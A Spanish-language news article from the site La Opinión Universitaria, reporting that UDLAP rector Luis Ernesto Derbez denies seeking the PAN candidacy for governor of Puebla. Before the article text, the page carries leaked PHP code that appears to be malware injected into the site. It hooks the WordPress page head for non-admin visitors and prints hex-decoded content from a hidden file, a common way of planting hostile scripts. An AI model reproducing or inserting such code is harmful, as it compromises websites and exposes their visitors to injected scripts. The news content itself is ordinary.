if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Niega Derbez buscar la candidatura a la gubernatura por el PAN – La Opinión Universitaria La Opinión Universitaria
Menu

Niega Derbez buscar la candidatura a la gubernatura por el PAN

Mary González

El rector de la Universidad de las Américas Puebla (Udlap), Luis Ernesto Derbez Bautista, descartó que tenga interés en buscar la candidatura a la gubernatura de Puebla por el PAN; consideró que el morenovallismo murió el pasado 24 de diciembre cuando se registró el accidente donde perdieron la vida Rafael Moreno Valle y Martha Erika Alonso Hidalgo, por lo que llamó a la unidad con miras al futuro electoral tanto en lo local como lo nacional.

 

En este sentido el rector aclaró que no es de su interés buscar la candidatura de su partido, pues está enfocado en trabajar en la rectoría de la universidad, además de que no cuenta con la ciudadanía poblana para poder contender.

 

Consideró que el tema de la ciudadanía debería ser eliminado, ya que no es posible evitar una candidatura sólo por no haber nacido en Puebla, sin embargo, insistió que no es un tema de su interés.

 

Dijo que Puebla está en medio de una situación difícil, sobre todo en su partido, ya que el accidente del pasado 24 de diciembremarco de manera definitiva al albiazul.

 

“Estoy convencido que mientras Rafael Moreno Valle estuvo como gobernador hubo en el partido lo que se llamaría el movimiento morenovallista, que estaba dominado por él, y eso permitió que se dieran las condiciones para que una persona con la empatía de Martha Erika Alonso obtuviera la gubernatura, como resultado de eso se pudiera haber mantenido el morenovallismo, sin embargo, el accidente eliminó a esa corriente que se pudo haber mantenido por mucho tiempo” apuntó.

 

Aunado a ello, comentó que la salida de muchos morenovallistas del PAN obedece a la orfandad qué hay en el partido por la muérete de ambos personajes.

 

Asimismo dijo que el PAN está en una situación crítica a nivel nacional, pues a nivel local el golpe fue fuerte porque no hay personajes que encabecen las contiendas, por lo que señaló el partido deber ser fuerte y buscar presencia local y nacional, pues tendría que preocuparles las elecciones de 2021 y 2024 no sólo local.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes